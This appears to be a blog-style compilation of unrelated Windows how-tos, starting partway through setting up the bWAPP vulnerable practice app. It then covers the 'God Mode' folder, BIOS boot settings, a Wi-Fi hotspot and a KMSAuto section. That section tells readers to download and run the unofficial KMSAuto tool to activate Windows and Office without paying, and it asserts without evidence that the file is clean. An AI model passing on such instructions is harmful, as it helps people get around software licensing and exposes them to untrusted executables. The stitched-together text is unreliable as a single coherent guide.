Once the progress bar is completely green, the PHP Mail Parameters screen will appear. Leave the SMTP server aslocalhost, and change the email address to one of your choosing. Click Next to continue.

Download the latest version of the Software from the here

Extract BWAPP lab setup in the location” C:\wamp\WWW\bWAPP” as is shown below.

Edit the file ‘admin/settings.php’ with your own database connection settings. Leave blank db_password anddb_name options

Browse to the file ‘install.php’ in the directory ‘bWAPP

http://localhost/bWAPP/install.php

Click on ‘here‘ (Click ‘here’ to install bWAPP). The database ‘bWAPP‘ will be created

Again Edit the file ‘admin/settings.php’ and setup the db_name see the screenshot below

Go to the login page. If you browse the bWAPP root folder you will be redirected. http://localhost/bWAPP/

 Login with the default credentials or make a new user.

Default credentials:

User name: bee

Password: bug

Turn on Windows “God Mode” on the Desktop

Windows 8 has countless settings you can hack, tweak, and customize. Many of them are accessible via the Control Panel and other scattered locations throughout Windows. It can be time-consuming to find them all, and the likelihood is that you’ll never remember where they all live. That means that many tweaks and hacks are far away, and some you’ll never even find.
There’s a simple solution: Use what some people call “God Mode.” Despite its name, it’s not really a separate mode. Instead, it’s a hidden folder that gives you fast access to all those settings. All you have to do is bring it out of hiding and place it on the Desktop.
To do it, right-click the Desktop and select New→Folder (Figure 3-10). Rename the folder GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}.

ScreenShot_20160402185717
Creating a new folder on the desktop
The folder icon changes, and it has the name GodMode

ScreenShot_20160402185757

The God Mode folder on the Desktop
Note: The “God.Mode” text isn’t what turns the folder into a special folder—it’s the {ED7BA470-8E54-465E-825C-99712043E01C}.You can use any text before the curly brackets you want. So if you wanted the folder to be called Fred.Folder, you could do that as well by renaming it like this: Fred.Folder{ED7BA470-8E54-465E-825C-99712043E01C}. It would show up as FredFolder on the Desktop, but still have the same features.
Double-click the icon, and you’ll come to a folder that has many dozens of tweaks, settings, and hacks . They’re organized by category, and you can expand or shrink each category by clicking the small triangle next to each. Each category displays a number next to it, showing how many settings there are.

ScreenShot_20160402190017

Hacking the Hack
In the God Mode folder, you can create shortcuts to any of the items in the Quick Launch folder, in the Start Menu folder, and in the Power User Menu folder. That way they’re always within easy reach

 

Speed Up Boot Time

Hack Your BIOS for Faster Startups
When you turn on your PC, it goes through a set of startup procedures in its BIOS before it gets around to starting Windows.

So, if you speed up those initial startup procedures, you’ll make your system start faster.
You can speed up your startup procedures by changing the BIOS with the built-in setup utility.

How you run this utility varies from PC to PC, but you typically get to it by pressing either the Delete, F1, F2, or F10 key during startup. You’ll come to a menu with a variety of choices.

Here are the choices to make for faster system startups: Quick Power On Self Test (POST) When you choose this option, your system runs an abbreviated POST rather than the normal, lengthy one.

Change Your Boot Order If you change the boot order so that your BIOS checks the hard disk first for booting, it won’t check any other devices, and will speed up your startup time.

Boot Up Floppy Seek Disable this option. When it’s enabled, your system spends a few extra seconds looking for your floppy drive—a relatively pointless procedure, especially considering how infrequently you use your floppy drive.

Boot Delay Some systems let you delay booting after you turn on your PC so that your hard drive gets a chance to start spinning before bootup. Most likely, you don’t need to have this boot delay, so turn it off. If you run into problems, however, you can turn it back on.

How to Remove “Activate Windows” Watermark on Desktop or Laptop

Easily Remove “Activate Windows” Watermark

Are you sick with the “activate windows” watermark on your desktop or laptop screen that just won’t go away unless you pay the product full price of course that costs hundreds of dollars! Well, if you want to help Windows then you can pay the full amount easily. But to those you can’t then this tutorial is for you! It doesn’t matter if you are using Windows 7, 8, 8.1 or Windows 10 we can easily remove the watermark on those versions of Windows easily.

Instructions

  • Download KMSAuto 2015 Portable Version
  • If you are hesitant about the virus you can scan the file with your anti-virus to be sure. I am 100% though it is clean.
  • Unzip file and open up KMSAuto Net.exe

Activate Windows 10 and remove watermark

  • Click on the activation button and you will see 2 options
    • Activate Windows and Activate Office
  • For this tutorial, we will use Activate Windows option
  • Click Activate Windows and wait for the process to finish

Activate Windows

  • There you have it. Product successfully activated! On this step, you should see the watermark to disappear.
  • If you have your Microsoft office needed to be activated as well, then feel free to use the Activate office option too!

Make Your Own WIFI HotSpot using Desktop/Laptop + Screenshots

Create Your Own WIFI HotSpot using Laptop or Desktop

You can now turn your Laptop or Desktop to a Wifi router and easily create unlimited hotspots! Share your existing wired/wireless internet connection to others by creating your own hotspot and assigning your own password to it. You can even ask them to pay if you want though. Here’s how you can do it.

Why Use a WIFI Hotspot?

There are various reasons why you should use a WIFI Hotspot and some of them are as follows:

  • Problem 1: You have your internet connection and want to share it with others that do not have. Then turn on your WIFI Hotspot.
  • Problem 2: You want to make money with your internet connection and want to create a WIFI Hotspot with a password of it in which users will pay first before they got access.

How to create a WIFI Hotspot using your Windows 10 Desktop or Laptop?

Follow the below instructions and be amazed at how easy they are to implement.

Method 1: Using the Feature of Windows 10 OS

Create a WIFI Hotspot on Windows 10

The easiest way to do this is by using Windows 10 since you do not need any third-party software to make your hotspot. However, you should install the latest updates of this version of Windows since this feature is added to it.

Step 1: Open the General Settings Windows

Press the Windows button on your keyboard and click on the Settings “Gear” icon.

Open Settings Windows

Step 2: Click on the Network & Internet Settings

You updated windows 10 should have this feature available and should be not an issue to find. If you cannot find this feature then please update your Windows 10.

Click on the Network and Internet

Step 3: You can now setup your Wifi Hotspot

Click on the Mobile Hotspot and Tick “On”. Edit your Wifi name and password. You are now ready to publicize your WIFI hotspot to others. Please note that you can only add up to 8 devices to your Wifi network.

Windows 10 Wifi Hotspot Settings

On this version of Windows, everything is very easy to implement. Should you find some problems with this tutorial please comment below.

Method 2: Using Commercial Software

Windows 7, Windows 8, Windows 8.1 and Windows 10 OS for this method.

On this method, we are going to use a commercial software in which has tons of feature if you want to get serious on commercializing your internet connection. Some of the important features of this software are that you can add a limitation on each device connected to your WIFI Hotspot. Like you can limit the time the device is connected or limit the bandwidth the device must use.

Create a WIFI Hotspot using Connectify Hotspot

Step 1: First download Connectify Hotspot 2017

Click on the “Buy Now” button if you want to buy the full version of the software or click on “Download” to instantly download the product and use the free version with the limitation of course. These limitations are, however, not that important since you can still use the full use of the software.

Download Connectify Hotspot 2017

Step 2: Install and Open Connectify Hotspot 2017

You may need to reboot your PC to successfully install the software. After the installation, you are now ready to use Connectify Hotspot 2017. Please note that we are using the free version of the software thus, we cannot edit the WIFI name. You can still edit the WIFI password though. After that, you are now ready to start your Hotspot connection.

Create a Wifi Hotspot using Connectify Hotspot 2017

Step 3: Check your Mobile for the Hotspot

To go your mobile WIFI tab and check for the WIFI network you have just enabled.

Check for Additional WIFI Connection

Reminders: Note that you can only use the Hotspot you have created with both method when your PC is turned on.

So that was both methods I have used and currently using the create a wifi hotspot on my home and to the public. Feel free to share your own method by commenting below.